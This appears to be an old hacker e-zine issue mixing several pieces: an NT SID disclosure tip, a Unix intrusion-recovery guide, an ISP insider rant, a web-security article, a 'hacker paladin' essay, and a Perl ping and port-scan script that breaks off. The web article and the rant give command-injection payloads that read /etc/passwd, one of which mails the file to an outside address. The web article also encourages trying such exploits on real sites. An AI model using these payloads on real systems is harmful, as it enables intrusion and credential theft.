Event Archiver Enterprise is one of the easiest to use products in the event
log management market, and stands above the others with its flexibility.
We think of it as a "set once, run forever" application that saves your
organization considerable time and money. Given the average hourly cost of a
Windows NT/2000 administrator, deploying Event Archiver Enterprise greatly
reduces your organization's TCO. After installing Event Archiver,
administrators can start analyzing event log entries instead of just trying
to save and store them regularly
EventReporter Version 4.0
-------------------------
http://www.eventreporter.com/en/
Version 4.0 provides a number of important enhancements:
Support for message delivery via email
Client added - a graphical user interface for customizing EventReporter
Filtering of events based on severity code (e. g. error, warning,)
Greatly enhanced documentation
Greatly enhanced web site - especially support area
Remote Viewers - Event Log Monitor
----------------------------------
http://www.tntsoftware.com/products/emon22/viewers.asp
The Remote Viewer for Windows PC runs on
Microsoft® Windows 95, Windows 98, Windows NT
Let you search and display event log information as it is received by the
console. Receive user selected real-time Alerts from the console which are
immediately displayed in the Remote Viewer.
Provide remote management for processes, services, and device drivers
Provide remote search, edit, create user defined notes and message reference
Provide multiple remote command prompt windows
SECURITY ISSUE FOUND WHILE I WAS WRITING THIS PAPAER THE BUG WAS NOT OUT YET
============================================================================
To the one of you who know the SID in NT and the tool "sid2user" that allow
you to get the SID of the users .
Well I found a way to get the SID even Administrator Remotly if you certain
conditions are meet:
1- By default NT logs can be viewed remotly :)
2- If you have Audting Enabled
3- If your policies Block The account after certain failure count.
Now here is what you need to do to get NT Spit out the SID
----------------------------------------------------------
Try to login to the remote box using any exisiting account and the box
you will get a logong failure and in event viewer you will generate an
entry
Logon Failure:
Reason: Unknown user name or bad password
User Name: WaKiNg
Domain: WaK0
Logon Type: 3
Logon Process: KSecDD
Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
Workstation Name: \\BRAINCELL
If like I said you have a policy that block an account after certain count
You will you see this entry in your log file.
ser Account Locked Out:
Target Account Name: WaKiNg
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
Caller Machine Name: \\BRAINCELL
Caller User Name: SYSTEM
Caller Domain: NT AUTHORITY
Caller Logon ID: (0x0,0x3E7)
So now if you connect to the remote EVENT box using event viewer you will
be able to see the logs and you will see the SID
Target Account ID: S-1-5-21-431509504-1754822488-1124750213-500
I did not do any other research into this cause the objective was not to
find something but it was to write this paper :)
===============================================================================
Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good, Accept no limitations --:)
===============================================================================
[UNIX Autopsies]=================================================[Digital Ebola]
How to Perform A Autopsy (Oh God I've Been Owned)
A Text for Admins in the Wonderful World Of Unix
--------------------------------------------------------------------------------
No matter how good you are, eventually it's going to happen. You are going to
get owned. Now, while this might not happen as often to a senior level admin
that has been playing with UNIX for a long time, it will happen at one point.
This is mathematics. Someone is going to find a bug somewhere, or maybe you just
overlooked something. Never the less, it happened, stop crying like a baby, and
plan your next action. It doesnt cost 80 thousand dollars to bring boxes back
from the molestations of a 14 year old, but it does take some effort. You have
essential 3 options which I will explain:
1. Reinstall. Time consuming, but very effective. Quicker then the other methods
2. DE-Own the box. A little more time consuming then a reinstall, but you saved
your data.
3. Set up booby traps and wait.
OPTION #1
Reinstalling is such a pain. You have custom scripts to replace, custom
configurations for any of the services you may be running, and possibly even
custom software that has been written in-house. I can not stress to you the
importance of a back-up in any case. If you are not backing things up, you are
not doing your job. Period. Don't go blaming your loss on the hacker that got
you, because the same thing could have happened in the event of a hardware loss
or a Layer 1 disaster. If you were smart, restore from backups, fix the original
security hole, and your on your way. If you were not smart, well, you are going
to spend some time reconfiguring, but this is still faster then the next methods
I am about to detail.
OPTION #2
DE-Owning the box is time consuming. No doubt about it. You will gain alot of
information by doing this. What it takes is patience, and a lot of reading.
First of all, you need to assess the visable damage. Was there any webpage
defacements? Was there a nasty issue.net? Are users complaining of data loss?
Are the logs still intact? Also, did the cracker leave behind a history file?
Some crackers are way sloppy, either they are too much of a novice to know,
or they just plain don't care. At any rate, this is information you have to
collect.
After your damage assessment is complete, you can then begin to fix your box.
Chances are great, your cracker has left several backdoors in the system.
The golden rule of thumb is: Anything that runs as root can be a backdoor.
Some examples are, /bin/login , /root/.bash_profile , or any of your startup
scripts such as /etc/rc.x or /etc/init.d so forth and so on. If you know UNIX,
you will know what I am talking about. Another more simple backdoor is a
suid shell somewhere on the box. You check for all SUID programs by doing this:
owned$ find / -perm -4000 -print > suid
You are looking for anything out of the ordinary such as this:
-rwsr-sr-x 1 root root 426980 May 9 01:00 .bash
Now, why would there be a SUID program in someones home directory that is owned
by root? When did root put that there? Chances are, root did not. The kid that
was playing around as root did. And in most cases, executing that program as
a standard user will produce a root shell. Granted, there has been some
improvements on some versions of shells that has better UID control, but there
are alot of systems that will let you chmod +s sh and then run it as a user.
It runs as root. You become root.
Another even simpler backdoor can be found by simply checking your passwd file.
You would be surprised the number of admins that never watch their passwd file.
In this case you would be looking for:
digi:x:1000:1000:Digital Ebola,,,:/home/digi:/bin/bash
digi2:x:0:0:Digital Ebola,,,:/home/digi:/bin/bash
The cracker would then proceed to telnet into your machine as a normal user,
and then su to their rootshell. I must say, I have personally seen a backdoor
like this last for up to 78 days.
Another form of backdooring is the rootkit. crackers today are mostly unoriginal
people, either be it from lack of skill or from impatience. This is a good thing
for you the admin. Why? Their lack of creativity will allow you to find their
back doors easily due to the public archiving of these rootkits. You should
download every rootkit you can find, and do file compares between them and the
binaries of your flavor/distro. Common trojaned services are telnetd, identd and
even sshd. This takes time. Read the rootkit instructions, try the default
methods of accessing. Most people never even bother to customized a pre-built
rootkit. Another thing you can do, in certain cases, is checksum compares.
Vendors release checksums along with thier packages, for integrity checking,
and it has been known to help in recovery.
Now, if you have had a real professional come in your machine, then I can
honestly say that you may never find all the backdoors. I do not mean to
kill off your hopes of a recovery, but there are some out there that have
true finesse. I'll give you a example. Cracker comes in box via public exploit,
just as any kiddie. He see this system as one to keep. He does not modify a
webpage, he does not packet from the box. He wants to keep his access, to be
the ghost in the machine. He then trojans the kernel.
Dear admin, I must ask how well do you know your kernel configuration? Do you
REALLY know the modules that you are loading? You can do ANYTHING from the
kernel. End of story. I want to hide my processes, I want to become invisible.
I will make the kernel do what I want. A easy way to do this from a crackers
standpoint, is to install LIDS (if you are a Linux admin, if you are actual UNIX
admin, similar tactics can apply). Yes, the Linux Intrusion Detection System.
This thing can hide processes, make files undeleteable, and even monitor
modifications. LIDS is can be used for as many evil purposes as for good.
And most admins have never even noticed that their kernel has
been recompiled, and their machine rebooted. You would think that Admins would
pay more attention to their uptime, but there are ways of handling that too.
Someone that can write custom kernel modules can stay in your machine for as
long as they wish. Or at least until you recompile your kernel. Which means,
after your intrusion, a kernel recompile is a must. The heart of your operating
system has complete control, if the cracker controls your kernel, and knows how
to manipulate it, you are going to be fighting him for a long time. If you even
realize he is there.
OPTION #3
Setting up booby traps can be fun. It can also give you a good deal of
information. I am not talking about buying a pre-built "honey-pot". I am
talking about rigging the system to where you can watch your intruder.
See what he is doing. See where he is coming from. I will talk more about
what you can do for perfoming a autopsy in a moment. For now, lets concentrate
on what you need to know to be able to get to that point.
First thing, is isolating what the intruder has done, assess the damage.
Don't fix the problems, just write it all down. You must make it appear that
you don't have a clue that he is there. Now, the trick way to watch him, is to
work around what he has done. If he has not messed with your login service, you
will be able to hide a ttysnoops server. Once he is logged in, you can watch
his terminal session real time. Chances are, he has rigged the logs to wipe
themselves after each logout. Start another log daemon, make it look like a
service that is meant to be on the system. The cracker will most likely not
notice. Log everything he does. Install a sniffer, and hide the process and log
that too. This bringing me to the next section, doing the actual tracking.
TRACKING
You are now watching your server close for anything out of the ordinary. You
see cracker log in. You are watching his every movements. What do you do?
First thing, is to see where he is coming from. Is there a DNS reverse? or is
it a IP? Does the IP reverse? In most of these situations, most admins do not
know what to do beyond a simple nslookup, and if the IP does not reverse,
the admin thinks that its hopeless. Not so. You can perform a ARIN whois.
ARIN is the American Registery for Internet Numbers. They are the people in
charge of assigning IP's and they work closely with other agencys around the
world that perform that same function. If your attackers IP will not reverse,
go to ARIN (http://www.arin.net) and lookup the IP. It will come back to the
provider of that IP, and even sometimes a individule. At this point, you may
call these people and ask them who is in charge of that IP. If you are
suspecting a break-in, most providers are happy to help you out any way they
can, short of giving out personal information. You can then go from there, to
contacting the admin of that system, to see if its a actual user on his
system, or maybe he has suffered a break-in as well.
For IPs that do reverse, you can get the contact information of the domain
that is being utilized thru a whois with network solutions. Generally, the
contact of the domain will have some clue to who is using that machine, and
you will be able to compare notes if they have had a break-in as well.
Another thing you can do, if you were blessed with a web defacement, is to
check the web defacement mirrors. Chances are, if they hit you, they hit others
as well. You can then call the other people that had break-ins and compare
notes. Crackers that do web defacements are often very blatant about who they
are. A search on metacrawler or another popular search engine will often yield
interesting information. Maybe even point you to a home page with contact info!
Maybe the attacker IRC's. Most likely he is IRCing from his home machine. Be
advised, IRC is a very anonymous medium. Just because someone says they are
someone, does not mean they are that person. It is noteworthy to check it out,
but please, realize that IRC is not true to life.
Things you can do to make your autopsy go better...
I have already stressed the importance of backups. Any admin worth his title
knows to back his data up. Another thing you can do is use a loghost in addition
to logging locally to your machine. A loghost is wonderful. It basically allows
your machines to be penetrated, and yet you still have a full account of the
connections. Make your loghost as close to unbreakable as you can. Do not run
any other kinds of services on this box. Ideally, this machine will be local,
so you will not have to even run telnetd. You can rig a cronjob to backup your
networks logs to tape everynight, or even better, back up via CD burner. You
will thank yourself later. Keep in mind, your logs are only good until the point
the syslogd is killed.
You should make it policy to log every event on the system no matter how
small. It will develope a since of timing. If timings are wrong on your
daily events, either you have a malfunction or you have a intruder. There are
kernel modules availiable on the internet that allow you to log every command,
regardless of shell, thru your kernel. Installing this and logging to a remote
host is very effective for keeping your system monitored properly. Install
tripwire, or a like binary, as tripwire has its flaws, and keep its
database updated. Watch for little changes.
Everything you watch and log now, will make your life easier in the
event of a intrusion.
CONCLUSION
I see news reports of a hacker that is caught and fined 250,000 dollars. This
is the supposive cost of restoring the system. This is outrageous. The
higher the dollar amount, the longer the hacker goes away to prison. The
sentence can be longer for hacking a machine, then it is for murder. Have we
as a society decided that a Sun Enterprise 3500 is more important then a human
life? Yes, hacking is wrong. So is murder. Taking a human life should be more
of a charge then the taking of a server. It does not cost thousands of dollars
to replace data. It does take time. It does take work. I can have no sympathy
for a person that is too ignorant to back their data up. After all, are you
going to blame a hacker for a hardware malfunction? Before you go condemning
all hackers for your intrusion, please realize, that I could not have written
this text, without intruding on machines at one point in my life. There will
always be someone out there with more skill, or that has a piece of knowledge
that you don't. Accept it, it is the reason we got into computers in the first
place. If you are recovering from a intrusion, all you can do is learn from it,
and become a wiser person. You might get the hacker in the end, you might send
him to jail, but it is one of many. There will always be people out there that
can get in. Some suggestions so you do not become a statistic: watch your distro
/flavor's homepage for security updates. Watch bugtraq and securityfocus and
any other security site possible. There are people that develope new
vunerabilities every day. Watch out for these, and adjust your policies
accordingly. Read about intrusion detection systems and use them.
And if you do have a have a intrusion, don't just blame the hacker
and don't just blame yourself. It's a learning experience, not a very fun one,
but you will live thru it, and perhaps in the end teach someone else how to
get thru it.
EOF
/* The author did not get 0wned to write this :P */
[One Large ISP]==========================================[anonymous@legions.org]
One large ISP.
I work for a large ISP that we will call 'BSFISP'. I will cover the
tactics of this company and its all around shitty approch to bussness. We
will cover all of the following items:
- Company disaster 'recovery' plan
- Company security including Physical and Network
We will start out with the companys approch to disaster recovery and
backup, or lack there of. Lets say that you are the prowd owner of a
nation wide ISP with a very large customer base yet in the name of profit.
You have elected to ignore some things like a working UPS, working power
transfer switch, network redundency, etc. Lets say now that the unthinkable
happens, you loose power in the middle of peak hours. You get a call from
your NOC staff that are using thier personal cell phones because you are
too cheap to provide backup power on the phone switch. You drive into the
office to figure out what you should do because you have never taken the
time and money to come up with a procedure for a disaster. Your power
transfer switch is located in a room that only one person (The grounds
keeper) has a key to. But that does not matter becuase you did not invest
in a redundant power transfer switch and your only link to the outside
world has burst into flames. What to do now? Figure out howto save your
own ass. Spin control is the name of the game. You get one of your smarter
employee's to gain access to said room so that you can figure out howto
get the power back on so that you can get phones working (you are dreading
the employee phone bill because they are all using their cell phones to
call your partners). The very expencive UPS that you got at a discounted
price that should have powered the building for a hour has died after only
10 minutes of use ; the chillers have toasted. This is a nightmare. Now what
do you do? START BLAMING PEOPLE! Thats right its not YOUR fault. It must
be the NOC staff they were the only people in the building when the local
power company fucked up the grid! They must have done something to provoke
this. Blame them. Now to deal with your partners... Call a company meeting
and come up with a nice white lie that will not allow you to loose
face. This is the approach that my company took when we faced a power
outage. The problems we faced were not fixed. Anything that broke was
bandanged back together and it was business as usual. Currently we have
one broken generator, a UPS that will only last 10 minutes (Hardly enuff
time to shut down 50 HP netservers 3 SUN enterprise 3500's, many Cisco
routers and countless other servers.) We lost 10 pieces of equipment from
this because we do not run surge protection into the equipment.
It was GREAT. and NOTHING has changed. We did not tell our
partners and customers what happened.
Company security and why it costs too much to protect customer credit card
information:
Thats right folks at this ISP anyone can access our
accounting system with VERY little effort thanks to a web based interface
that the Systems admin's think is SO spiffy. "Well it is password
protected. So that makes it secure." that would be true in most cases
however with this company we have elected to moronic passwords to employees
like this:
Employee Name: John Doe
Employee Username : jdoe
employee Password: jdoe
If you are able to guess a employees name (not hard there is a list on the
website and yes.. the CEO's password is his username) you have access to
EVERYTHING on the network If you get a NOC persons username you are now
able to repoint domains delete the entire accounting system delete the
entire DNS/DHCP database, reconfigure tftp files for the routers and cable
modems. "Well if I do that they will know it was me because they HAVE to
keep logs!" Not to worry at BSFISP we do not believe in logging
anything. It takes to much disk space. Did I mention that the firewall we
have is about as effective as a screen door on a sub? The russians tride
this and look where they ended up.. Did I mention we run the ENTIRE
operation on NT servers? No.. they are not patched.. yes IIS is
exploitable on these machines in about 100 different ways. You can also
access our ticketing system from the outside work (did I tell you that the
script does not check for illegal characters? so that means in the input
boxes you can type "bla ; cat /etc/passwd" and on this unix machine it
will OUTPUT THE PASSWD FILE TO YOUR SCREEN!) fucked up ehh? We have a very
unsecure VPN as well.. but why bother breaking that when it does not give
you access to anything that you cant access from the outside world
anyway. The only thing it is used for is people on the inside of the
network needing access to things outside the network (thats backwards
isnt it?) Anyway you get the point that security is a joke.. ohh
yea.. they mag locks on the doors dont work. And no the company does not
plan on fixing this. They think that they will never get hacked..
So you think you want a job with this company? It is not hard.. however if
you have clue do not plan on having a easy life with this company they do
not like employees that think. Its bad and it makes the higher up
management look bad. Dont even think about pointing out anything that is
fucked up on the network.
Anyway I grow bored of typing so... there..
[Simple HTTP Security]===============================================[Phriction]
Web based security is probably one of the biggest problems on the internet
these days. Everyone wants their own web site or to run their own web site
and do so with little or no knowledge about their security. In this article
I'm going to talk about basic web security.
DIR LISTING
Directory listing is a major problem on lotsa of websites. When the
webmaster or whoever is running the website allows Dir listing I can view
files and folders in the directory's just as if I were to type ls -a.
Problem is usually upload things to there website they don't want people to
see or have stuff on their website that can lead to possible entry. For
I was looking at a site once that used php scripting and had Dir listings
which aloud me to find a backup copy of the php code which infact was used
as a frontend to a SQL database in the code were login/passwords to the SQL
database and the box. I usually like to check Dir listings on /cgi-bin/
when surfing the web just to see how many sites allow it and surprisingly
enough sites do to keep me checking. The cgi-bin is probably one of the most
dangerous places to have Dir listing cause lotsa people upload cgi scripts
or files even though they never use them and in most cases httpd is suid
nobody or root which means it could executes it's commands with root priveleg
es so for example an old exploit of php.cgi using it to retrieve the /etc/pas
swd by having entering the command into your web browser http://www.target.co
m/cgi-bin/php.cgi?/etc/passwd. Lots of people don't write there own cgi script
s they usually just use one of the internet so by searching for these files in
a script archive you can possible exploit the script after reading the code.
FUN WITH FORMS
More and more web pages these days use forms for a basic information or
for anything the problem is this if the script used to parse the form doesn't
filter out arbitrary characters you can use this too your advantage. For
example in cgi script AnyForm it doesn't parse out any arbitrary characters
entered before it invokes a shell. So we enter into the form <input type="hid
den" name="recipient" value="phric@legions.org; cat /etc/passwd;/usr/lib/send
mail -t phric@legions.org"> then submit the form. Now since the cgi invokes a
shell the ; is used to identify the end of a command string so in place of
cat /etc/passwd; can be placed any_command; for the script to execute on the
server.By viewing the source of the form and seeing which script it is using
to parse the form you can search for the script in archives. View the source
and see if it's possible to exploit it.
HASTALAVISTA.COM
Well and some of you know altavista.com can be a bored computer users
best friend, or script kiddie central, but maybe the more people who hear
about this the more aware the public will be of vulnerabilities in webpages.
I can already here some of you right now saying the exploits I named in this
file are out of date and how most forms these days parse out the values of
forms but I sit here and beg to differ. Goto http://www.altavista.com and
for the parameters for your search type in for example +/cgi-bin/php.cgi
and what shows up prolly some security paper on how bad it is to have php.cgi
but also it returns websites running it. Kinda disgusting eh? I here the word
0-day being used more and more but it's sad when a 365-day++ exploit works
and I'm talking .mil sites here also. Try it for yourself if your bored and
want to make a site go Hasta la vista.
PHRICTION HTTP SECURITY SCANNER PRE-RELEASE VER 0.5
Well I know you all use Whisker for your HTTP scans but what about us
who use windows boxes well we could run a perl interpreter but come on
the average script kiddie doesn't even know what that is. So thank me I ported
a Version of my Pre-Release HTTP scanner for windows simple and easy to use
a VB GUI interface soon to come for the command line inept of us. This version
just searches for exploitable files doesn't exploit them yet. Yes you will
hafta go search bugtrag on how to exploit them. Read the README to learn the
rest thank you.
Scanner avalaible at Http://phriction.sk1llz.net/programs.html
Bugs, Comments, Suggestions phric@legions.org
[Hacker Paladins]======================================================[Raschid]
/* Editors Note: Many of our readers has expressed a certain need to well,
express themselves. Not everyone can talk tech all the time, but they certainly
do vent out through their writings. Which, has brought a change of thinking
to the Keen Veracity staff. KV has primary been a technical zine, a forum to
express ideas based on technology. We believe that in order to reach this point,
one must take a stride through some other areas in order to stimulate thought
processes. We hope to maintain a level of technical savvy, but we would also
like to let some others stretch that expertise into something that merges tech,
mind and soul. Hopefully, we may be able to stretch our intellects through the
wanderings of personal expression.
*/
Behold a broken world, we pray,
Where want and war increase,
And grant us, Lord, in this our day,
The ancient dream of peace.
No force of arms shall there prevail
Nor Justice cease its sway;
Nor shall their loftiest visions fail
The dreamers of the day."
-"Behold a Broken World"; Christian hymn
Of what benefit is there in fighting darksiders? Of what gain is
there in thwarting their advances into the souls of our people? What use
is there in resisting this element amongst us which rejects honor, which
rejects knowledge, which rejects curiosity; which rejects all that is
good, and clean, and noble and yet allows baseness, corruption and
dishonor to flow so freely amongst the hearts and minds of our people? O
my brothers and sisters in the underground, is this not a disgraceful
thing? Through this we have found dishonor and ill favor among the other
people of the world, that our name is considered a curse on the lips of
all who utter it. Our name is that of the wolf on the lips of the
digital lambs.
And few care.
Few it seems, give a jolly damn about the consequences of their
action. Gone are the days of technical competence to achieve amazing
results. Gone are the days of literature exclaiming the hacker as a good
guy, someone who might just be alright, who is not necessarily the
harbinger of doom, the demon of cyberspace. It's been suggested, half
seriously, that the Anti-Christ just might be himself a hacker. And what
of it, my friends? In our post-modernist society, where pop-culture has
the attention span of an infant, it would seem plausible that such
concepts as love, loyalty and virtuous living play a role in their lives
only insomuch as it fails to inconvenience them. If our current age of
people cannot abide such concepts, how can the hacker underground? For
surely, we are nothing but the cybernetical extension of our
surroundings.
What has Zarcae to offer that your television does not? We offer
the concepts of love, of ennobling our hacker brethren with those
virtues which have long disappeared from the mainstream culture. There
are two conceptions of the world of cyberspace floating about in the
common parlance. One is of the Wild West, where cigarette champing
cowboys roamed over an anarchistic frontier, where the only law was laid
down by whomever had the fastest gun and most ammunition. What few
authorities there were of true law and order were jokes typically,
facsimiles of those virtues. The second main idea of cyberspace (and
less popular one) is that of the medieval era, where the monarchy being
replaced instead with the technocracy of sorts. That is to say loosely,
that the more technical ability a person possesses, the higher in the
social order of his relative society he will be. A main thesis of Zarcae
holds this second main ideal of cyberspace to be the most accurate, and
charges that hackers are the equivalent of knights in the Middle Ages.
With our skills at intrusion, and the ability to wreck concentrated,
disciplined havoc among computer systems, with said skills even
possessing the ability to wreck chaos outside of cyberspace, it could be
said that the possession of such skills is the equivalent, literally, of
the militial skills of those historic knights.
The problem with out analogy is that it begs for complicated
technical expertise. This is no longer the case, as lamented by Erik
Bloodaxe in the last Phrack editorial he did as editor in chief of it a
few years back. He commented that as the level of technical competency went
down, the quality of hacker went down in direct proportion, and the
quantity of people ABLE to pursue violent action in cyberspace rose
inversely. This is to say, still following our analogy, that as the
level of military training needed went down, and as the level of
technology rose so that even fools could fight skillful battles with
rudimentary muskets and such , the quality of knights went down (where
"quality" is equated with "ethicality") in direct proportion, and the
amount of people able to engage in battle rose inversely.
These are simple questions, OBVIOUS questions, but ones rarely
asked or answered. Most people fail to consider the squires and would-be
mercenaries of the underground (i.e., script kiddies, "warez" pirates)
as knights, but this does not necessarily fail to distinguish them from
those skilled cybernetic knights who have wholly sold their skills to
the pursuit of profit or power, whom we call "darksiders". These hacker
have given away their talent, prostituted their ability in the cause of
baseness and immorality. They have betrayed their cultural legacy, and
as such, propose a direct threat to us all.
What then, does Zarcae propose to do about the mercenary class of
hacker which has sprung up in the underground? How do we propose to
counter-act the sea of immorality plaguing our people? What to do?
Zarcae proposes to arise two new ideals of hacker. As I have stated, a
basic Zarcae tenet is to hold hackers as knights; what is needed is to
raise that standard further, to bring home the concept of the 'paladin
hacker', which is to say, the concept of the hacker who fights with
righteousness and the good on his side, bringing said lost virtues back
to his people. To such a hacker, there is no enemy insurmountable, no
evil so great as to not be overcome. Why, then, is our task called
glorious? Because it is the stirring of the human soul against tyranny,
it is the ringing cry to battle which lies in the hearts of all people,
the noble love and fierce loyalty all hold towards family and people. We
are protecting our own. The second concept is that of the 'scholar
hacker'. Too long has the underground languished under a shadow of
ignorance. Too long has communication flowed in tiny spurts among the
elite, so that the gifted beginners in the underground gain knowledge to
join their princely ranks only TO finally join as those jaded members
they formerly swore never to become. Jaded, and incapable of rendering
good works unto their fellow men and women as their high status
honorably requires through moral obligation. Zarcae proposes the
establishment of a hacker intelligentsia. We need an intellectual elite,
capable of fielding the hostile outsider lashings of a world which
misunderstands us, which fears and reviles us. We need hacker
apologeticists, who can reasonably combat these arguments against the
very existence of our people.
There are scattered individuals who fight against this tide of
incompetence so dominant in our people in the underground today. It is
to be hoped that Zarcae will only be the first of such groups to
encourage honest debate and intellectual argument among the underground,
that others may follow, and so allow their lights to shine even greater
than ours. We are the first, but the first is not necessarily the
greatest, and in time. I feel, there will come others whose light will
shine so much as to eclipse Zarcae's very memory. As to that time, I^M
feel little sorrow, since we will have accomplished our purpose in
igniting the passions of those intellectual descendants. Let our memory
pass away into Time, as we ought to have no need of the vanities of
mortal men. Let our deeds stand as our legacy, aside from vain words.
Combined with the holy righteousness of the paladin, and the
thoughtful pondering of the scholar, we come upon the question as to
central motivation. What WILL be the overriding passion to which will
give rise to all the actions of those who follow the Ethic? The answer
to that is: Love. It is love of our fellow men and women which will
inspire us to our acts of daring in cyberspace. It is through love that
we will graciously accept the persecutions that the federal authorities
and our mis-understanding brethren in the underground will render
against us, and it is through love that we will inspire them to quit
their heinous acts, lay down their swords of injustice, and follow us.
Without love, all these virtues of justice, nobility, honor, would be
useless. What use is the dispensing of the actions of goodness, without
it being tempered with the love of the people involved? There is no
goodness where love is not present. The Ethic forces our behavior
outside of cyberspace to reflect our actions inside of it. The hacker
who has spent his nights away from the modem carousing, drinking,
cursing has no place in the hacker paladin ranks; how could he condemn
the darksider when his soul is half there already?
"Love must be sincere. Hate what is evil; cling to what is good."
-Romans12:9
Without love, the eloquence of the greatest prophets ring hollow.
There is no urge to follow noble ideals, only the lust of profit, and
for power. Without love, the great deeds of virtuous men seem empty, and
devoid of that noble spark, crumbling eventually, and sinking back again
into the pit where evil waits patiently for the fall of all things,
noble and un-noble alike.
"So justice is driven back
And righteousness stands at a distance;
Truth has stumbled in the streets,
Honesty cannot enter.
Truth is nowhere to be found,
And whoever shuns evil becomes a prey."
-Isaiah 59:14-15
I have talked in the past of hackers who give lip-service to the
ideals we express, but do nothing. How foolish are they! The ideals we
express should be as a fire in your blood, constantly upon the brain,
and a sword upon your tongue, to go forth and deliver your messages of
goodness to the entire hacker community, that we may reform our manner,
and so become true paladins and knights, and no longer mercenaries or
bandits as we have fallen to.
"What good is it, my brothers, if a man claims to have faith but no
deeds? Can such faith save him? Suppose a brother or sister is without
clothes and daily food. If one of you says to him "Go, I wish you well;
keep warm and well fed', but does nothing about his physical needs, what
good is it? In that same way, faith by itself, if it is not accomplished
by action, is dead. But someone will say, You have faith; I have deeds.'
Show me your faith without deeds, and I will you my faith by what I do.
You believe there is one God. Good! Even the demons believe that and
shudder."
-James 2:14-19
As such, do we find later in James, another passage about wisdom
and deeds. For a man or woman to be considered wise by Zarcae standards
is not much; it is only to live as a person of faith in the Ethic, and
to show that Ethic through their actions to others, both in cyberspace,
and out. Such a man or woman need not even themself be a hacker, for
surely my friends, that I am not. I have adopted the hacker underground
as my own people, and would hope likewise to have been adopted, but I
myself am not of the same stock as you, I have not learned the same
tenants, have little knowledge of the same technology. This is not to
say, friends, that I do not desire it. However, I have found it hard to
find such knowledge, and wish readily enough for teachings, as I suppose
many others of good quality do. This is somewhat what I mean by an
established intelligentsia. It is as of yet too difficult for the gifted
of our people to learn. We must establish some method to raise our
people our of ignorance, raising them in knowledge with the Ethic, so as
to form a community of hacker paladins and scholars.
"Who is wise and understanding among you? Let him show it by his good
life, by deeds done in the humility which comes from wisdom. But if you
harbor bitter envy and selfish ambition in your hearts, do not boast
about it or deny the truth. Such wisdom does not come down from heaven
but is earthly, unspiritual....[f]or where you have envy and selfish
ambition, there you will find disorder and every evil practice."
-James 3:13-16
What then, is the quality of those who would follow the Zarcadian
Ethic? It is simply to be loving of all, foe and friend alike. It is
nothing to love your friends, even the worst of your fellow men and
women manage that. If you can curse the feds and love your friends, what
is that? You have failed in the Ethic, and are unworthy to be counted
among the ranks of the paladins. Your sin describes you, and you have
shown by your deed that you are not of our kind. Therefore, to love your
foe is not to be submissive to them. They cannot understand their error
so long as they labor under the clouds of their ignorance and lusts of
power and social status. Your must teach them as you can, the errors of
their ways. Failing that, you must hand them over to their respective
justice systems, in the hope that such will correct their ethic
troubles. Many among you will be puzzled by this, but it remains true.
The federal authorities, though they will certainly persecute you, are
nonetheless your allies in your endeavors. They abide by the same ideals
largely, that you do. Justice is the basic idea of our modern legal
system. Ineffectual or not, it is all we have to go by.
Another reason remains for our assistance of the federal
authorities of their capturing of the most malignant of the darksiders:
they simply are overmanned. It is estimated that the FBI would have to
spend every day, of every year, with every agent, just to keep barely
current with computer crime. Currently, the Computer Crime Unit of the
FBI and the computer crime specialists of the Secret Service is
ludicrously small, and inept at any efforts to stop the waves of attacks
that darksiders launch daily on the digitally innocent. As paladins, we
owe it to these authorities to help them in their quest.
I spoke earlier of envy and ambition. Such is to be avoided at all
costs by the followers of the Ethic. I myself am the leader of Zarcae
only by default of having created the group; no doubt there are others
more eloquent, more impassioned in their speech, more technically
competent to lead than I; surely there are others beside whom my
knowledge and talents are as those of a child. In the absence of such
characters, I believe it my duty to lead the group. Envy is horrible for
paladins; why be jealous of a brother or sister who is better
technically able? This is foolish. The better thing is to ask assistance
from that person on what ails you technically, so that you may better
serve others through your skills. If they are of little help to
you,
what of it? There are thousands of areas in electronics, computers, and
such, where you could otherwise occupy and specialize. Even those who
know nothing of hacking at all are useful in their writing talents; they
may be hacker ethicists, who argue for a logical philosophical basis on
which we may rest our actions firmly.
With all that said, welcome to the coming Revolution friends, and
Godbless.
-Raschid
*Founder of Warzael Zarcae
[PERL Site Verification]================================================[Crater]
Howdy, aight aight.. give me a break, I am a Texan. Anyways... I was asked
to summit a few of my programs(scripts and anything else I could come up
with on short order) for the ezine. Now, dont get me wrong, I am by no means
a guru in programming. I am rather a jack of all trades. And I am
always very king on modifying others code to suit my purpose. Don't
reinvent the wheel is my motto.
I leave the real stuff for the more technical. LOL :)
Now, I think my first program should be something that will actually be of
some use. I know you got alot of sys admins out there that already know
alot of what I am about to show you, but is still usefull.
But I am writing this for the new upstarts out there that are trying to get
there foot in the door. I use this perl script at work for a site
verification system. DigiEbola has since wrote another one
that works really well.. But, needless to say, I LIKE MINE!!! j/k.
Ok.. now the things you will need.
You will need the Net-Ping module, IO-File-Multi module. On a few systems
these should already be installed.. but, if not.. just surf on over to the
CPAN site and download them.. they are very very useful modules that will do
nothing but make your perl life easier. Now, enough talk lets get down to
what you came here for. What I am about to show you is by no means the only
way to script this.. its just the way I like it.. thats it.
Ok.. first a explanation. Where I work, we bring on data centers around the
world and alot of times we have to retrofit the centers. In doing that,
we have alot of systems at one time we have to make sure are actually there.
Now, I have been able to use fping and nmap, exscan and alot of others that
do the same exact thing that this script does.. I just wanted one script
that does it all.. and that was real easy to set up on other systems to
run. So.. here we go.
#### Normal stuff here
#!/usr/bin/perl
########################
#Site Verification
########################
# Written by me Crater
#
# You can contact me at ddfelts@ultravision.net
# if you need help with anything.
#
########################
use Net::Ping;
# Declare our args
$file = @ARGV[0];
$file1 = "alive.$file";
# so we can send multi prints using one call..
# so one print statement can go to diffrent places.. just a time saver..
use IO::File::Multi;
# so we can do the port scan stuff
use IO::Socket;
# We want to use icmp packets here...
$host = Net::Ping->new("icmp");
# define our multi object
$mult = new IO::File::Multi;
# to stdout
$mult->open('>-');
# to our alive.#file
$mult->open(">>$file1");
unless ($file) {
print "Usage: SiteVera <infile>argv0\n";
}
else {
# Open our data file.. should be just a plain ip file with
# ip number on each line.
open(INFO, "<$file");
# put each line in a array
@lines = <INFO>;
#close file
close(INFO);
#check to see if ip is alive
#and port scan to see what services
#are on the alive ips
foreach $line (@lines)
{
unless ($host->ping($line, 2)) {
$mult->print("$line Not responding\n");
} else {
$mult->print("$line is alive\n");
#now lets port scan the alive ip
for($port=1;$port<=500;$port++) {
